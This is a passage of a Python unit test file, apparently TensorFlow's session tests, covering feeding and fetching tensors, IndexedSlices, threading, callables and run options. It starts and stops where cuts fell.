2]).astype(np.int64) ind = ops.IndexedSlices( array_ops.placeholder(dtype=np.float32, shape=(2,)), array_ops.placeholder(dtype=np.int64, shape=(2, 3)), array_ops.placeholder(dtype=np.int64, shape=(3,)), ) ind_values = array_ops.identity(ind.values) ind_indices = array_ops.identity(ind.indices) ind_dense_shape = array_ops.identity(ind.dense_shape) ind2 = ops.IndexedSlices(ind_values, ind_indices, ind_dense_shape) # Feed with tuple values_out, indices_out, dense_shape_out = s.run( [ind_values, ind_indices, ind_dense_shape], { ind: (values, indices, dense_shape) }) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # Feed with IndexedSlicesValue values_out, indices_out, dense_shape_out = s.run( [ind_values, ind_indices, ind_dense_shape], { ind: ops.IndexedSlicesValue(values, indices, dense_shape) }) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # Feed with IndexedSlicesValue, fetch IndexedSlicesValue ind2_out = s.run(ind2, { ind: ops.IndexedSlicesValue(values, indices, dense_shape) }) self.assertAllEqual(ind2_out.values, values) self.assertAllEqual(ind2_out.indices, indices) self.assertAllEqual(ind2_out.dense_shape, dense_shape) def testFetchIndexedSlicesWithoutDenseShape(self): with session.Session() as s: indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64) values = np.array([1.0, 2.0]).astype(np.float32) dense_shape = None ind = ops.IndexedSlices( constant_op.constant(values), constant_op.constant(indices), None) # Single fetch, use as tuple ind_out = s.run(ind) values_out, indices_out, dense_shape_out = ind_out self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # Single fetch, use as IndexedSlicesValue ind_out = s.run(ind) self.assertAllEqual(ind_out.values, values) self.assertAllEqual(ind_out.indices, indices) self.assertAllEqual(ind_out.dense_shape, dense_shape) # Tuple fetch, use as tuple values_out, indices_out, dense_shape_out = s.run(ind) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # List fetch, use as tuple (values_out, indices_out, dense_shape_out), = s.run([ind]) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) self.assertAllEqual(dense_shape_out, dense_shape) # List fetch, use as IndexedSlicesValue ind_out, = s.run([ind]) self.assertAllEqual(ind_out.values, values) self.assertAllEqual(ind_out.indices, indices) self.assertAllEqual(ind_out.dense_shape, dense_shape) def testFeedIndexedSlicesWithoutDenseShape(self): with session.Session() as s: values = np.array([1.0, 2.0]).astype(np.float32) indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64) dense_shape = None ind = ops.IndexedSlices( array_ops.placeholder(dtype=np.float32, shape=(2,)), array_ops.placeholder(dtype=np.int64, shape=(2, 3)), None) ind_values = array_ops.identity(ind.values) ind_indices = array_ops.identity(ind.indices) ind2 = ops.IndexedSlices(ind_values, ind_indices) # Feed with tuple values_out, indices_out = s.run([ind_values, ind_indices], { ind: (values, indices) }) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) # Feed with IndexedSlicesValue values_out, indices_out = s.run([ind_values, ind_indices], { ind: ops.IndexedSlicesValue(values, indices, dense_shape) }) self.assertAllEqual(values_out, values) self.assertAllEqual(indices_out, indices) # Feed with IndexedSlicesValue, fetch IndexedSlicesValue ind2_out = s.run(ind2, { ind: ops.IndexedSlicesValue(values, indices, dense_shape) }) self.assertAllEqual(ind2_out.values, values) self.assertAllEqual(ind2_out.indices, indices) self.assertAllEqual(ind2_out.dense_shape, dense_shape) def testExtendWithStatelessOperations(self): with session.Session() as s: a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[2, 3]) c = math_ops.matmul(a, b) c_val = s.run(c) self.assertAllEqual([[4.0, 4.0, 4.0]], c_val) d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1]) e = math_ops.matmul(c, d) # Extend will happen here. e_val = s.run(e) self.assertAllEqual([[24.0]], e_val) def testExtendWithStatefulOperations(self): with session.Session() as s: a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[2, 3]) c = math_ops.matmul(a, b) v = variables.Variable(c, name='testExtendWithStatefulOperations_v') v.initializer.run() v_val = v.eval() self.assertAllEqual([[4.0, 4.0, 4.0]], v_val) d = constant_op.constant(3.0, shape=[2, 3]) e = math_ops.matmul(a, d) assign_e_to_v = state_ops.assign(v, e) # Extend will happen here. e_val = e.eval() self.assertAllEqual([[6.0, 6.0, 6.0]], e_val) v_val = v.eval() self.assertAllEqual([[4.0, 4.0, 4.0]], v_val) s.run(assign_e_to_v) v_val = v.eval() self.assertAllEqual([[6.0, 6.0, 6.0]], v_val) def testExtendWithGroupBy(self): with session.Session() as s: a = constant_op.constant(1.0, shape=[1, 2]) p = variables.Variable(a, name='testExtendWithGroupBy_p') a_val = a.eval() # Force an Extend after this op. self.assertAllEqual([[1.0, 1.0]], a_val) b = constant_op.constant(2.0, shape=[1, 2]) q = variables.Variable(b, name='testExtendWithGroupBy_q') # Extend will happen here. init = control_flow_ops.group(p.initializer, q.initializer) s.run(init) p_val, q_val = s.run([p, q]) self.assertAllEqual([[1.0, 1.0]], p_val) self.assertAllEqual([[2.0, 2.0]], q_val) def testTensorGetMethod(self): with session.Session(): a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[2, 3]) c = math_ops.matmul(a, b) c_val = c.eval() self.assertAllEqual([[4.0, 4.0, 4.0]], c_val) fed_c_val = c.eval(feed_dict={a.name: [[4.0, 4.0]]}) self.assertAllEqual([[16.0, 16.0, 16.0]], fed_c_val) @test_util.run_v1_only('b/120545219') def testOperationRunMethod(self): with session.Session(): a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[1, 2], name='b') v = variables.VariableV1(a, a.dtype) assign_a_to_v = state_ops.assign(v, a) assign_a_to_v.eval() v_val = v.eval() self.assertAllEqual([[1.0, 1.0]], v_val) assign_b_to_v = state_ops.assign(v, b) assign_b_to_v.eval() v_val = v.eval() self.assertAllEqual([[2.0, 2.0]], v_val) assign_b_to_v.eval(feed_dict={'b:0': [[3.0, 3.0]]}) v_val = v.eval() self.assertAllEqual([[3.0, 3.0]], v_val) def testDefaultGraph(self): with session.Session() as s: self.assertEqual(ops.get_default_graph(), s.graph) a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[2, 3]) self.assertEqual(ops.get_default_graph(), a.graph) self.assertEqual(ops.get_default_graph(), b.graph) c = math_ops.matmul(a, b) v = variables.Variable(c, name='testDefaultGraph_v') v.initializer.run() v_val = v.eval() self.assertAllEqual([[4.0, 4.0, 4.0]], v_val) d = constant_op.constant(3.0, shape=[2, 3]) e = math_ops.matmul(a, d) assign_e_to_v = state_ops.assign(v, e) e_val = e.eval() self.assertAllEqual([[6.0, 6.0, 6.0]], e_val) v_val = v.eval() self.assertAllEqual([[4.0, 4.0, 4.0]], v_val) s.run(assign_e_to_v) v_val = v.eval() self.assertAllEqual([[6.0, 6.0, 6.0]], v_val) self.assertEqual(ops.get_default_graph(), s.graph) def _testDefaultGraphInThread(self, constructed_event, continue_event, i): with session.Session() as s: self.assertEqual(ops.get_default_graph(), s.graph) a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[2, 3]) c = math_ops.matmul(a, b) v = variables.Variable(c, name='var_%d' % i) # Block here until all threads have constructed their graph. constructed_event.set() continue_event.wait() assign_c_to_v = state_ops.assign(v, c) v.initializer.run() assign_c_to_v.eval() v_val = v.eval() self.assertAllEqual([[4.0, 4.0, 4.0]], v_val) d = constant_op.constant(3.0, shape=[2, 3]) e = math_ops.matmul(a, d) assign_e_to_v = state_ops.assign(v, e) e_val = e.eval() self.assertAllEqual([[6.0, 6.0, 6.0]], e_val) v_val = v.eval() self.assertAllEqual([[4.0, 4.0, 4.0]], v_val) s.run(assign_e_to_v) v_val = v.eval() self.assertAllEqual([[6.0, 6.0, 6.0]], v_val) self.assertEqual(ops.get_default_graph(), s.graph) def testDefaultGraphWithThreads(self): # Fork ten threads that use their thread-local default graph. threads = [] constructed_events = [threading.Event() for _ in range(10)] continue_event = threading.Event() for i, constructed_event in enumerate(constructed_events): t = self.checkedThread( target=self._testDefaultGraphInThread, args=(constructed_event, continue_event, i)) threads.append(t) for t in threads: t.start() for constructed_event in constructed_events: constructed_event.wait() continue_event.set() for t in threads: t.join() def testParallelRun(self): with session.Session() as sess: c = constant_op.constant(5.0) ev = threading.Event() def run_step(): ev.wait() val = c.eval(session=sess) self.assertEqual(val, 5.0) threads = [self.checkedThread(target=run_step) for _ in range(100)] for t in threads: t.start() ev.set() for t in threads: t.join() @staticmethod def _build_graph(): time.sleep(random.random() * 0.1) # Do some graph construction. Try to exercise non-trivial paths. graph = ops.get_default_graph() gdef = None for _ in range(10): x = array_ops.placeholder(dtype=dtypes.float32) with ops.colocate_with(x): y = array_ops.placeholder(dtype=dtypes.float32) with ops.device('/cpu:0'): z = control_flow_ops.while_loop( lambda x, y: x < 10, lambda x, y: (x + 1, x * y), [x, y]) with graph._attr_scope({'_a': attr_value_pb2.AttrValue(b=False)}): gradients_impl.gradients(z, [x, y]) if gdef is None: gdef = graph.as_graph_def() else: importer.import_graph_def(gdef, name='import') @test_util.run_v1_only('b/120545219') def testParallelRunAndSingleBuild(self): with session.Session() as sess: c = constant_op.constant(5.0) stop = threading.Event() def run_loop(): while not stop.is_set(): time.sleep(random.random() * 0.1) self.assertEqual(sess.run(c), 5.0) threads = [self.checkedThread(target=run_loop) for _ in range(10)] for t in threads: t.start() SessionTest._build_graph() stop.set() for t in threads: t.join() @test_util.run_v1_only('b/120545219') def testParallelRunAndParallelBuild(self): with session.Session() as sess: c = constant_op.constant(5.0) stop = threading.Event() def run_loop(): while not stop.is_set(): time.sleep(random.random() * 0.1) self.assertEqual(sess.run(c), 5.0) run_threads = [self.checkedThread(target=run_loop) for _ in range(10)] for t in run_threads: t.start() build_threads = [self.checkedThread(target=SessionTest._build_graph) for _ in range(10)] for t in build_threads: t.start() for t in build_threads: t.join() # Let the run_threads run until the build threads are finished. stop.set() for t in run_threads: t.join() def testRunFeedDict(self): with session.Session() as s: x = array_ops.zeros([2]) y = s.run(2 * x, feed_dict={x: np.ones(2).astype(np.float32)}) self.assertAllEqual(y, 2 * np.ones(2)) y = s.run(2 * x, feed_dict={x.name: np.ones(2).astype(np.float32)}) self.assertAllEqual(y, 2 * np.ones(2)) y = s.run(2 * x, feed_dict={x: [1, 1]}) assert (y == 2 * np.ones(2)).all() # Test nested tuple keys z = (((array_ops.zeros([2]),),), array_ops.zeros([2]), (array_ops.zeros([2]),)) result = [z[0][0][0] * 2, z[1] * 2, z[2][0] * 2] values = (((np.array([1, 1]),),), np.array([2, 2]), (np.array([3, 3]),)) result_value = s.run(result, feed_dict={z: values}) self.assertAllEqual(result_value[0], 2 * np.ones(2)) self.assertAllEqual(result_value[1], 2 * np.array([2, 2])) self.assertAllEqual(result_value[2], 2 * np.array([3, 3])) def testGraphDef(self): with session.Session() as sess: self.assertProtoEquals('versions { producer: %d min_consumer: %d }' % (versions.GRAPH_DEF_VERSION, versions.GRAPH_DEF_VERSION_MIN_CONSUMER), sess.graph_def) c = constant_op.constant(5.0, name='c') self.assertEquals(len(sess.graph_def.node), 1) d = constant_op.constant(6.0, name='d') self.assertEquals(len(sess.graph_def.node), 2) self.assertAllEqual(c.eval(), 5.0) self.assertAllEqual(d.eval(), 6.0) e = constant_op.constant(7.0, name='e') self.assertEquals(len(sess.graph_def.node), 3) self.assertAllEqual(e.eval(), 7.0) def testUseAfterClose(self): with session.Session() as sess: c = constant_op.constant(5.0) self.assertAllEqual(sess.run(c), 5.0) with self.assertRaisesWithPredicateMatch( RuntimeError, lambda e: 'Attempted to use a closed Session.' in str(e)): sess.run(c) def testUseAfterCloseConcurrent(self): with session.Session() as sess: c = constant_op.constant(5.0) self.assertAllEqual(sess.run(c), 5.0) def update_thread(): with self.assertRaisesWithPredicateMatch( RuntimeError, lambda e: 'Attempted to use a closed Session.' in str(e)): while True: sess.run(c) t = threading.Thread(target=update_thread) t.start() time.sleep(0.1) sess.close() t.join() def testUseEmptyGraph(self): with session.Session() as sess: with self.assertRaisesRegexp(RuntimeError, 'The Session graph is empty.'): sess.run([]) with self.assertRaisesRegexp(RuntimeError, 'The Session graph is empty.'): sess.run(()) with self.assertRaisesRegexp(RuntimeError, 'The Session graph is empty.'): sess.run({}) @test_util.run_v1_only('b/120545219') def testNotEntered(self): # pylint: disable=protected-access self.assertEqual(ops._default_session_stack.get_default(), None) # pylint: enable=protected-access with ops.device('/cpu:0'): sess = session.Session() c_1 = constant_op.constant(5.0) with sess.graph.as_default(): c_2 = constant_op.constant(5.0) self.assertEqual(c_1.graph, c_2.graph) self.assertEqual(sess.run(c_2), 5.0) with self.assertRaisesWithPredicateMatch( ValueError, lambda e: 'No default session is registered.' in str(e)): c_2.eval() @test_util.run_v1_only('b/120545219') def testInteractive(self): with ops.device('/cpu:0'): sess = session.InteractiveSession() a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[2, 3]) c = math_ops.matmul(a, b) self.assertAllEqual([[4.0, 4.0, 4.0]], c.eval()) d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1]) e = math_ops.matmul(c, d) self.assertAllEqual([[24.0]], e.eval()) sess.close() @test_util.run_v1_only('b/120545219') def testMultipleInteractiveSessionsWarning(self): # Reinitialize the global state to ensure that the expected warnings will # be emitted. session.InteractiveSession._active_session_count = 0 # pylint: disable=protected-access sess = session.InteractiveSession() sess.run(constant_op.constant(4.0)) # Run so that the session is "opened". sess.close() # Opening and closing interactive sessions serially should not warn. with warnings.catch_warnings(record=True) as w: sess = session.InteractiveSession() sess.close() self.assertEqual(0, len(w)) with warnings.catch_warnings(record=True) as w: sess = session.InteractiveSession() self.assertEqual(0, len(w)) with warnings.catch_warnings(record=True) as w: sess2 = session.InteractiveSession() self.assertEqual(1, len(w)) self.assertTrue('An interactive session is already active. This can cause ' 'out-of-memory errors in some cases. You must explicitly ' 'call `InteractiveSession.close()` to release resources ' 'held by the other session(s).' in str(w[0].message)) sess2.close() sess.close() @test_util.run_v1_only('b/120545219') def testInteractivePlacePrunedGraph(self): sess = session.InteractiveSession() # Build a graph that has a bad op in it (no kernel). # # This test currently does not link in any GPU kernels, # which is why placing this is invalid. If at some point # GPU kernels are added to this test, some other different # op / device combo should be chosen. with ops.device('/device:GPU:0'): a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(1.0, shape=[1, 2]) # Only run the valid op, this should work. b.eval() with self.assertRaises(errors.InvalidArgumentError): a.eval() sess.close() @test_util.run_v1_only('b/120545219') def testDefaultSessionPlacePrunedGraph(self): sess = session.Session() # Build a graph that has a bad op in it (no kernel). # # This test currently does not link in any GPU kernels, # which is why placing this is invalid. If at some point # GPU kernels are added to this test, some other different # op / device combo should be chosen. with ops.device('/device:GPU:0'): _ = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(1.0, shape=[1, 2]) with self.assertRaises(errors.InvalidArgumentError): # Even though we don't run the bad op, we place the entire # graph, which should fail with a non-interactive session. sess.run(b) sess.close() def testSharedGraph(self): with ops.Graph().as_default() as g, ops.device('/cpu:0'): a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[2, 3]) c = math_ops.matmul(a, b) with session.Session(graph=g) as sess1: with session.Session(graph=g) as sess2: self.assertAllEqual(sess1.run(c), sess2.run(c)) def testDuplicatedInputs(self): with session.Session() as sess: a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[1, 3]) a_val, b_val, a2_val = sess.run([a, b, a]) self.assertAllEqual(a_val, [[1.0, 1.0]]) self.assertAllEqual(b_val, [[2.0, 2.0, 2.0]]) self.assertAllEqual(a2_val, [[1.0, 1.0]]) def testFeedAndFetch(self): with session.Session() as sess: for dtype in [ dtypes.float16, dtypes.float32, dtypes.float64, dtypes.int32, dtypes.uint8, dtypes.int16, dtypes.int8, dtypes.int64, dtypes.bool, dtypes.complex64, dtypes.complex128 ]: for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]: np_dtype = dtype.as_numpy_dtype feed_t = array_ops.placeholder(dtype=dtype, shape=shape) out_t = array_ops.identity(feed_t) np_array = np.random.randint(-10, 10, shape) if dtype == dtypes.bool: np_array = np_array > 0 elif dtype == dtypes.complex64: np_array = np.sqrt(np_array.astype(np_dtype)) elif dtype == dtypes.complex64: np_array = np.sqrt(np_array.astype(np_dtype)) else: np_array = np_array.astype(np_dtype) self.assertAllEqual(np_array, sess.run(out_t, feed_dict={ feed_t: np_array })) # Check that we can also get the feed back. self.assertAllEqual(np_array, sess.run(feed_t, feed_dict={ feed_t: np_array })) # Also check that we can get both back. out_v, feed_v = sess.run( [out_t, feed_t], feed_dict={ feed_t: np_array }) self.assertAllEqual(np_array, out_v) self.assertAllEqual(np_array, feed_v) feed_fetch_runner = sess.make_callable([out_t, feed_t], [feed_t]) out_v, feed_v = feed_fetch_runner(np_array) self.assertAllEqual(np_array, out_v) self.assertAllEqual(np_array, feed_v) def testMakeCallableOnTensorWithRunOptions(self): with session.Session() as sess: a = constant_op.constant(42.0) tensor_runner = sess.make_callable(a, accept_options=True) run_options = config_pb2.RunOptions( trace_level=config_pb2.RunOptions.FULL_TRACE) run_metadata = config_pb2.RunMetadata() self.assertEqual(0, len(run_metadata.step_stats.dev_stats)) res = tensor_runner(options=run_options, run_metadata=run_metadata) self.assertEqual(42.0, res) self.assertGreater(len(run_metadata.step_stats.dev_stats), 0) def testMakeCallableOnOperationWithRunOptions(self): with session.Session() as sess: a = variables.Variable(42.0) b = state_ops.assign_add(a, 1.0) sess.run(a.initializer) tensor_runner = sess.make_callable(b.op, accept_options=True) run_options = config_pb2.RunOptions( trace_level=config_pb2.RunOptions.FULL_TRACE) run_metadata = config_pb2.RunMetadata() self.assertEqual(0, len(run_metadata.step_stats.dev_stats)) tensor_runner(options=run_options, run_metadata=run_metadata) self.assertEqual(43.0, sess.run(a)) self.assertGreater(len(run_metadata.step_stats.dev_stats), 0) def testMakeCallableWithFeedListAndRunOptions(self): with session.Session() as sess: ph = array_ops.placeholder(dtypes.float32) a = math_ops.add(ph, 1.0) tensor_runner = sess.make_callable( a, feed_list=[ph.name], accept_options=True) run_options = config_pb2.RunOptions( trace_level=config_pb2.RunOptions.FULL_TRACE) run_metadata = config_pb2.RunMetadata() self.assertEqual(0, len(run_metadata.step_stats.dev_stats)) self.assertAllClose(42.0, tensor_runner( 41.0, options=run_options, run_metadata=run_metadata)) self.assertGreater(len(run_metadata.step_stats.dev_stats), 0) def testOptimizedMakeCallable(self): with session.Session() as sess: ph = array_ops.placeholder(dtypes.float32) a = math_ops.add(ph, 1.0) callable_opts = config_pb2.CallableOptions() callable_opts.feed.append(ph.name) callable_opts.fetch.append(a.name) for _ in range(3): callable_fn = sess._make_callable_from_options(callable_opts) for _ in range(5): self.assertEqual([2.0], callable_fn(np.array(1.0, dtype=np.float32))) def testOptimizedMakeCallableWithRunMetadata(self): with session.Session() as sess: ph = array_ops.placeholder(dtypes.float32) a = math_ops.add(ph, 1.0) callable_opts = config_pb2.CallableOptions() callable_opts.feed.append(ph.name) callable_opts.fetch.append(a.name) callable_opts.run_options.trace_level = config_pb2.RunOptions.FULL_TRACE callable_fn = sess._make_callable_from_options(callable_opts) run_metadata = config_pb2.RunMetadata() self.assertEqual([2.0], callable_fn(np.array(1.0, dtype=np.float32), run_metadata=run_metadata)) self.assertGreater(len(run_metadata.step_stats.dev_stats), 0) def testFeedError(self): with session.Session() as sess: feed_t = array_ops.placeholder(dtype=dtypes.float32) out_t = array_ops.identity(feed_t) feed_val = constant_op.constant(5.0) with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'): sess.run(out_t, feed_dict={feed_t: feed_val}) with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'): out_t.eval(feed_dict={feed_t: feed_val}) with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'): out_t.op.run(feed_dict={feed_t: feed_val}) def testFeedPrecisionLossError(self): with session.Session() as sess: largest_int64 = np.iinfo(np.int64).max feed_int_implicit_int32 = constant_op.constant(1) feed_int_explicit_int32 = constant_op.constant(1, dtype=dtypes.int32) out_t = constant_op.constant(1.0) with self.assertRaisesRegexp(TypeError, 'is not compatible with Tensor type'): sess.run(out_t, feed_dict={feed_int_implicit_int32: largest_int64}) with self.assertRaisesRegexp(TypeError, 'is not compatible with Tensor type'): sess.run(out_t, feed_dict={feed_int_explicit_int32: largest_int64}) def testStringFetch(self): with session.Session(): for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]: size = 1 for s in shape: size *= s c_list = np.array( [compat.as_bytes(str(i)) for i in xrange(size)], dtype=np.object).reshape(shape) if size > 0 else [] c = constant_op.constant(c_list) self.assertAllEqual(c.eval(), c_list) def testStringFeed(self): with session.Session() as sess: for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]: size = 1 for s in shape: size *= s c_list = np.array( [compat.as_bytes(str(i)) for i in xrange(size)], dtype=np.object).reshape(shape) feed_t = array_ops.placeholder(dtype=dtypes.string, shape=shape) c = array_ops.identity(feed_t) self.assertAllEqual(sess.run(c, feed_dict={feed_t: c_list}), c_list) self.assertAllEqual( sess.run(feed_t, feed_dict={ feed_t: c_list }), c_list) c_v, feed_v = sess.run([c, feed_t], feed_dict={feed_t: c_list}) self.assertAllEqual(c_v, c_list) self.assertAllEqual(feed_v, c_list) def testStringFeedWithNullCharacters(self): with session.Session(): c_list = [b'\n\x01\x00', b'\n\x00\x01'] feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2]) c = array_ops.identity(feed_t) out = c.eval(feed_dict={feed_t: c_list}) self.assertEqual(c_list[0], out[0]) self.assertEqual(c_list[1], out[1]) def testStringFeedWithUnicode(self): with session.Session(): c_list = [ u'\n\x01\x00', u'\n\x00\x01', u'\u26a3 unicode', u'\U0001f60e deal with it' ] feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[len(c_list)]) c = array_ops.identity(feed_t) out = c.eval(feed_dict={feed_t: c_list}) for i in range(len(c_list)): self.assertEqual(c_list[i], out[i].decode('utf-8')) out = c.eval(feed_dict={feed_t: np.array(c_list, dtype=np.object)}) for i in range(len(c_list)): self.assertEqual(c_list[i], out[i].decode('utf-8')) def testInvalidTargetFails(self): with self.assertRaisesRegexp( errors.NotFoundError, 'No session factory registered for the given session options'): session.Session('INVALID_TARGET') def testFetchByNameDifferentStringTypes(self): with session.Session() as sess: c = constant_op.constant(42.0, name='c') d = constant_op.constant(43.0, name=u'd') e = constant_op.constant(44.0, name=b'e') f = constant_op.constant(45.0, name=r'f') self.assertTrue(isinstance(c.name, six.text_type)) self.assertTrue(isinstance(d.name, six.text_type)) self.assertTrue(isinstance(e.name, six.text_type)) self.assertTrue(isinstance(f.name, six.text_type)) self.assertEqual(42.0, sess.run('c:0')) self.assertEqual(42.0, sess.run(u'c:0')) self.assertEqual(42.0, sess.run(b'c:0')) self.assertEqual(42.0, sess.run(r'c:0')) self.assertEqual(43.0, sess.run('d:0')) self.assertEqual(43.0, sess.run(u'd:0')) self.assertEqual(43.0, sess.run(b'd:0')) self.assertEqual(43.0, sess.run(r'd:0')) self.assertEqual(44.0, sess.run('e:0')) self.assertEqual(44.0, sess.run(u'e:0')) self.assertEqual(44.0, sess.run(b'e:0')) self.assertEqual(44.0, sess.run(r'e:0')) self.assertEqual(45.0, sess.run('f:0')) self.assertEqual(45.0, sess.run(u'f:0')) self.assertEqual(45.0, sess.run(b'f:0')) self.assertEqual(45.0, sess.run(r'f:0')) def testIncorrectGraph(self): with ops.Graph().as_default() as g_1: c_1 = constant_op.constant(1.0, name='c') with ops.Graph().as_default() as g_2: c_2 = constant_op.constant(2.0, name='c') self.assertEqual('c', c_1.op.name) self.assertEqual('c', c_2.op.name) with session.Session(graph=g_1) as sess_1: self.assertEqual(1.0, sess_1.run(c_1)) with self.assertRaises(ValueError): sess_1.run(c_2) with self.assertRaises(ValueError): sess_1.run(c_2.op) with session.Session(graph=g_2) as sess_2: with self.assertRaises(ValueError): sess_2.run(c_1) with self.assertRaises(ValueError): sess_2.run(c_1.op) self.assertEqual(2.0, sess_2.run(c_2)) def testFeedDictKeyException(self): with session.Session() as sess: a = constant_op.constant(1.0, dtypes.float32, name='a') with self.assertRaisesRegexp(TypeError, 'Cannot interpret feed_dict'): sess.run(a, feed_dict={'a': [2.0]}) def testPerStepTrace(self): run_options = config_pb2.RunOptions( trace_level=config_pb2.RunOptions.FULL_TRACE) run_metadata = config_pb2.RunMetadata() with ops.device('/cpu:0'): with session.Session() as sess: sess.run(constant_op.constant(1.0)) self.assertTrue(not run_metadata.HasField('step_stats')) sess.run(constant_op.constant(1.0), run_metadata=run_metadata) self.assertTrue(not run_metadata.HasField('step_stats')) sess.run( constant_op.constant(1.0), options=run_options, run_metadata=run_metadata) self.assertTrue(run_metadata.HasField('step_stats')) self.assertEquals(len(run_metadata.step_stats.dev_stats), 1) def testRunOptionsRunMetadata(self): run_options = config_pb2.RunOptions( trace_level=config_pb2.RunOptions.FULL_TRACE) run_metadata = config_pb2.RunMetadata() with ops.device('/cpu:0'): with session.Session() as sess: # all combinations are valid sess.run(constant_op.constant(1.0), options=None, run_metadata=None) sess.run( constant_op.constant(1.0), options=None, run_metadata=run_metadata) self.assertTrue(not run_metadata.HasField('step_stats')) sess.run( constant_op.constant(1.0), options=run_options, run_metadata=None) self.assertTrue(not run_metadata.HasField('step_stats')) sess.run( constant_op.constant(1.0), options=run_options, run_metadata=run_metadata) self.assertTrue(run_metadata.HasField('step_stats')) self.assertEquals(len(run_metadata.step_stats.dev_stats), 1) def testFeedShapeCompatibility(self): with session.Session() as sess: some_tensor = constant_op.constant([2.0, 2.0, 2.0, 2.0]) new_shape = constant_op.constant([2, 2]) reshaped_tensor = array_ops.reshape(some_tensor, new_shape) with self.assertRaisesRegexp(ValueError, 'Cannot feed value of shape'): sess.run(reshaped_tensor, feed_dict={some_tensor: [1.0, 2.0, 3.0]}) with self.assertRaisesRegexp( errors.InvalidArgumentError, 'Input to reshape is a tensor with 4 values, ' 'but the requested shape has 21'): sess.run(reshaped_tensor, feed_dict={new_shape: [3, 7]}) def testInferShapesFalse(self): with ops.Graph().as_default(), ops.device('/cpu:0'): a = constant_op.constant([[1, 2]]) sess = session.Session() self.assertFalse('_output_shapes' in sess.graph_def.node[0].attr) # Avoid lint error regarding 'unused' var a. self.assertTrue(a == a) def testInferShapesTrue(self): config_pb = config_pb2.ConfigProto( graph_options=config_pb2.GraphOptions(infer_shapes=True)) with ops.Graph().as_default(), ops.device('/cpu:0'): a = constant_op.constant([[1, 2]]) sess = session.Session(config=config_pb) self.assertTrue('_output_shapes' in sess.graph_def.node[0].attr) # Avoid lint error regarding 'unused' var a. self.assertTrue(a == a) def testBuildCostModel(self): run_options = config_pb2.RunOptions() config_pb = config_pb2.ConfigProto( allow_soft_placement=True, graph_options=config_pb2.GraphOptions(build_cost_model=100)) with session.Session(config=config_pb) as sess: with ops.device('/device:GPU:0'): a = array_ops.placeholder(dtypes.float32, shape=[]) b = math_ops.add(a, a) c = array_ops.identity(b) d = math_ops.multiply(c, c) for step in xrange(120): run_metadata = config_pb2.RunMetadata() sess.run( d, feed_dict={a: 1.0}, options=run_options, run_metadata=run_metadata) if step == 99: self.assertTrue(run_metadata.HasField('cost_graph')) else: self.assertFalse(run_metadata.HasField('cost_graph')) def runTestOutputPartitionGraphs(self, sess): run_options = config_pb2.RunOptions(output_partition_graphs=True) a = constant_op.constant(1) run_metadata = config_pb2.RunMetadata() sess.run(a, options=run_options, run_metadata=run_metadata) self.assertGreater(len(run_metadata.partition_graphs), 0) sess.run(a, run_metadata=run_metadata) self.assertEqual(len(run_metadata.partition_graphs), 0) @test_util.run_v1_only('b/120545219') def testOutputPartitionGraphsDirect(self): self.runTestOutputPartitionGraphs(session.Session()) @test_util.run_v1_only('b/120545219') def testOutputPartitionGraphsDistributed(self): server = server_lib.Server.create_local_server() self.runTestOutputPartitionGraphs(session.Session(server.target)) def testNonInteractiveSessionNesting(self): sess1 = session.Session() sess1_controller = sess1.as_default() sess1_controller.__enter__() sess2 = session.Session() sess2_controller = sess2.as_default() sess2_controller.__enter__() with self.assertRaisesRegexp(AssertionError, 'Nesting violated'): sess1_controller.__exit__(None, None, None) ops._default_session_stack.reset() def testInteractiveSessionNesting(self): sess1 = session.InteractiveSession() sess2 = session.InteractiveSession() del sess1 del sess2 @test_util.run_v1_only('b/120545219') def testAsDefault(self): c = constant_op.constant(37) sess = session.Session() with sess.as_default(): self.assertEqual(37, c.eval()) # Ensure that the session remains valid even when it is not captured. with session.Session().as_default(): self.assertEqual(37, c.eval()) def testReentry(self): sess = session.Session() with self.assertRaisesRegexp(RuntimeError, 'not re-entrant'): with sess: with sess: pass def testInvalidArgument(self): with self.assertRaisesRegexp(TypeError, 'target must be a string'): session.Session(37) with self.assertRaisesRegexp(TypeError, 'config must be a tf.ConfigProto'): session.Session(config=37) with self.assertRaisesRegexp(TypeError, 'graph must be a tf.Graph'): session.Session(graph=37) @test_util.run_v1_only('b/120545219') def testTimeoutWithShortOperations(self): num_epochs = 5 q = data_flow_ops.FIFOQueue(capacity=50, dtypes=[dtypes.int32], shapes=[()]) enqueue_op = q.enqueue_many(constant_op.constant([1, 2])) # Use a 10-second timeout, which should be longer than any # non-blocking enqueue_many op. config_pb = config_pb2.ConfigProto(operation_timeout_in_ms=10000) 